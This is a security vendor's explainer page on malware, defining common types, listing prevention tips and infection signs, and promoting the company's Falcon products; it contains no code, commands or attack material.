Malware Definition
Malware (malicious software) is an umbrella term used to describe a program or code created to harm a computer, network, or server. Cybercriminals develop malware to infiltrate a computer system discreetly to breach or destroy sensitive data and computer systems. There are many types of malware infections, which make up most of the online threat landscape.
Hackers have different goals when performing a malware attack on a system or organization, and it often depends on who is on the receiving end and the type of attack. Some of the most common goals of a malware attack include:
- Make a profit off targets
- Sabotage
- Steal confidential data
- Make a statement
- Bragging rights
Types of Malware
In the years since the Morris Worm debuted, adversaries have applied a great deal of creativity to the concept of malware, coming up with new types of attacks as enterprise technology has evolved. The most common types of malware today are:
Type | Description |
---|---|
Ransomware | In a ransomware attack, an adversary encrypts a victim’s data and offers to provide a decryption key in exchange for a payment. Ransomware attacks are usually launched through malicious links delivered via phishing emails, but unpatched vulnerabilities and policy misconfigurations are used as well. |
Fileless Malware | Fileless malware is a type of malicious activity that uses native, legitimate tools built into a system to execute a cyber attack. Unlike traditional malware, fileless malware does not require an attacker to install any code on a target’s system, making it hard to detect. |
Spyware | Spyware is a type of unwanted, malicious software that infects a computer or other device and collects information about a user’s web activity without their knowledge or consent. |
Adware | Adware is a type of spyware that watches a user’s online activity in order to determine which ads to show them. While adware is not inherently malicious, it has an impact on the performance of a user’s device and degrades the user experience. |
Trojan | A trojan is malware that appears to be legitimate software disguised as native operating system programs or harmless files like free downloads. Trojans are installed through social engineering techniques such as phishing or bait websites. The zeus trojan malware, a variant, has the goal accessing financial information and adding machines to a botnet. |
Worms | A worm is a self-contained program that replicates itself and spreads its copies to other computers. A worm may infect its target through a software vulnerability or it may be delivered via phishing or smishing. Embedded worms can modify and delete files, inject more malicious software, or replicate in place until the targeted system runs out of resources. |
Rootkits | Rootkit malware is a collection of software designed to give malicious actors control of a computer network or application. Once activated, the malicious program sets up a backdoor exploit and may deliver additional malware. Bootkits take this a step further by infecting the master boot prior to the operating system being on boot up, going undetectable at times. |
Mobile Malware | Mobile malware is any type of malware designed to target mobile devices. Mobile malware is delivered through malicious downloads, operating system vulnerabilities, phishing, smishing, and the use of unsecured WiFi. |
Exploits | An exploit is a piece of software or data that opportunistically uses a defect in an operating system or an app to provide access to unauthorized actors. The exploit may be used to install more malware or steal data. |
Scareware | Scareware tricks users into believing their computer is infected with a virus. Typically, a user will see scareware as a pop-up warning them that their system is infected. This scare tactic aims to persuade people into installing fake antivirus software to remove the “virus.” Once this fake antivirus software is downloaded, then malware may infect your computer. |
Keylogger | Keyloggers are tools that record what a person types on a device. While there are legitimate and legal uses for keyloggers, many uses are malicious. In a keylogger attack, the keylogger software records every keystroke on the victim’s device and sends it to the attacker. |
Botnet | Botnet is a network of computers infected with malware that are controlled by a bot herder. The bot herder is the person who operates the botnet infrastructure and uses the compromised computers to launch attacks designed to crash a target’s network, inject malware, harvest credentials or execute CPU-intensive tasks. |
MALSPAM | Malicious malware (MALSPAM) delivers malware as the malicious payload via emails containing malicious content, such as virus or malware infected attachments. |
Malware Infection Across Devices
All types of device can be infected with malware if they are not properly equipped with an IoT security strategy to protect all devices. Some of devices that can be infected include:
- PC Malware: There are many malware variants that specifically target PCs, such as Wannacry Ransomware and zero-day exploits.
- Mac Malware: Contrary to popular belief, Macs can also be infected with malware. There is a relatively new adversary known to evade Mac security countermeasures called CrescentCore. Protect your Mac with a comprehensive security solution ready to protect all endpoints.
- Android Malware: Mobile phones with an Android operating system are also susceptible to malware attacks, usually hiding in suspicious text messages and emails opened through a mobile email app.
- iOS Malware: iPhones and iPad tablets operating with an iOS operating system can suffer from a malware attack via social engineering. One of the most common threats for iOS is Pegasus spyware.
Download this Falcon Discover for IoT data sheet to learn how it can help address the challenges facing security teams.
Download Now18 Tips to Prevent a Malware Attack
For most businesses, deploying a breach prevention solution or platform that continuously monitors for malware attacks will be the first line of defense. Here are a few more tips to help you and your organization minimize the risks of a malware attack:
- Do not download software from unknown sources.
- Do not click on pop-ups.
- Follow strong password best practices such as changing default passwords and using a variety of characters.
- Implement identity and access management capabilities such as multi-factor authentication (MFA).
- Use VPN to go online safely, securely, and anonymously so your data and privacy stays protected.
- Do not lend your devices to anyone else, even if it is someone you know.
- Do not open emails and/or attachments from unknown senders
- Do not click on unknown links on social media, emails, text messages, or any other device.
- Stick to top-level domains (those with .com, .org, .edu, .gov, etc)
- Do not download unknown software and make sure if trusted, make sure to only download those components of the software you will need.
- Delete apps or programs you do not use anymore.
- Beware of apps you download. Check the app store reviews to ensure no malignant actors have been discovered within.
- Do not jail-break your phone.
- Keep your operating systems and plugins up to date and only download official updates.
- Backup your data! If you ever lose it, you’ll be able to recover it.
- Implement a comprehensive cybersecurity training program for stakeholders to spread awareness of most common adversaries, ways they operate, and best practices to take to prevent an attack.
- Shift to a culture centered on security to ensure it is something everyone thinks about at every step of every process.
- Install cybersecurity software with threat intelligence capabilities to stay on top of all adversaries to prevent an attack and quickly remediate if there is a breach.
2023 CrowdStrike Global Threat Report
Download the 2023 Threat Intelligence Report to find out how security teams can better protect the people, processes, and technologies of a modern enterprise in an increasingly ominous threat landscape.
Download NowHow to Detect Malware
No matter how well you try to avoid malware, you’re likely to run into newer, more innovative variants at some point. When you do, advanced malware protection is your best defense.
Advanced malware protection uses a unique and integrated combination of methods to prevent and detect known malware, unknown malware, and fileless malware. These methods include machine learning, exploit blocking, behavioral analysis, and blacklisting.
Traditional Antivirus (AV) is simply no longer effective to detect malware.
Signs You Have a Malware Infection
Signs and symptoms of malware can be obvious or discrete. Here are a few common signs that may indicate you have a malware infection:
- Slow computer
- Very frequent ads and pop-ups, especially if they appear in unexpected places
- Battery drains rapidly
- System crashes
- Sudden loss in disk space
- Browser settings change on their own
- Browser redirects on its own
- Unfamiliar apps appear on mobile device
- Increase in system’s internet activity
- Disabled antivirus product
- Lost access to files or computer
- Deleted files
- Contacts receive strange messages from you
How to Remove Malware
The key to removing malware from your device is installing and running next-generation antivirus (NGAV) software. Upon detecting malware, NGAV can help identify and remediate malicious artifacts left behind from malicious activity.
For maximum efficacy, it’s crucial to keep your antivirus software updated so that it can stay ahead of constantly evolving malware attacks. The Falcon platform offers a next-gen solution that allows for automatic sensor update and constant system scans – users do not have to worry about manually updating the software or scanning for malware.
Here are some additional resources that can guide you through the process of removing malware:
Protect Against Malware
The first step to protect against malware attacks is to adopt a proactive approach by following the prevention tips mentioned above. Nevertheless, this is not a perfect world and a breach might still happen.
With the growing threat of mobile malware, organizations need visibility into which devices are accessing their networks and how they’re doing it. CrowdStrike’s Falcon for Mobile delivers mobile endpoint detection and response with real-time visibility into IP addresses, device settings, Wifi and Bluetooth connections, and operating system information.
Want to see how the CrowdStrike Falcon® Platform blocks malware? Start a free trial and see how it performs against live malware samples.